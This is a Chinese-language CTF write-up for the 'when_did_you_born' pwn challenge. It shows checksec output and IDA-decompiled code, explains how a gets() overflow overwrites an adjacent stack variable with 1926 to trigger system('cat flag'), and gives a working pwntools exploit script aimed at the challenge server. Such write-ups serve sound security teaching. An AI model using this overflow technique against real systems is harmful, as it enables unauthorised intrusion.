题目:when_did_you_born
拖进pe查看文件详情
checksec查看
无PIE,堆栈不可执行,栈保护
运行跑一遍逻辑
进64位IDA调试
f5反编译main函数
得到源码
__int64 __fastcall main(__int64 a1, char **a2, char **a3)
{
__int64 result; // rax@4
__int64 v4; // rdx@9
char v5; // [sp+0h] [bp-20h]@5
unsigned int v6; // [sp+8h] [bp-18h]@1
__int64 v7; // [sp+18h] [bp-8h]@1
v7 = *MK_FP(__FS__, 40LL);
setbuf(stdin, 0LL);
setbuf(stdout, 0LL);
setbuf(stderr, 0LL);
puts("What's Your Birth?");
__isoc99_scanf("%d", &v6);
while ( getchar() != 10 )
;
if ( v6 == 1926 )
{
puts("You Cannot Born In 1926!");
result = 0LL;
}
else
{
puts("What's Your Name?");
gets(&v5);
printf("You Are Born In %d\n", v6);
if ( v6 == 1926 )
{
puts("You Shall Have Flag.");
system("cat flag");
}
else
{
puts("You Are Naive.");
puts("You Speed One Second Here.");
}
result = 0LL;
}
v4 = *MK_FP(__FS__, 40LL) ^ v7;
return result;
}
我们看输出flag的if条件
if ( v6 == 1926 )
{
puts("You Shall Have Flag.");
system("cat flag");
}
即我们输入的v6=1926的时候会输出flag,但当我们尝试输入生日是1926的时候程序执行如下
说明程序其实是走了上面的代码
if ( v6 == 1926 )
{
puts("You Cannot Born In 1926!");
result = 0LL;
}
也就是说程序既要我们的v6=1926,也不然我们的v6=1926,但可以看到的是程序中的v5却是我们可以进行手动输入的,因此我们尝试通过输入v5的的变量来覆盖v6的栈内存,从而让v6=1926
找v5和v6的变量双击进去,查看其偏移量
从v5的位置,不包含v5但包含v6向上数,数到v6是八个偏移,因此需要先用自己制定的payload填满这8个地址,然后向后拼接上我们输入的1926,这样一来,偏移的8个地址被挤满了之后我们输入的内容就可以顺利溢出进v6变量中了
构造脚本:
from pwn import *
p = remote('220.249.52.133',37558)
p.recvuntil("What's Your Birth?")
p.sendline('suibainshu')
payload = 'A'*8
p.recvuntil("What's Your Name?")
p.sendline(payload + p64(1926))
p.interactive()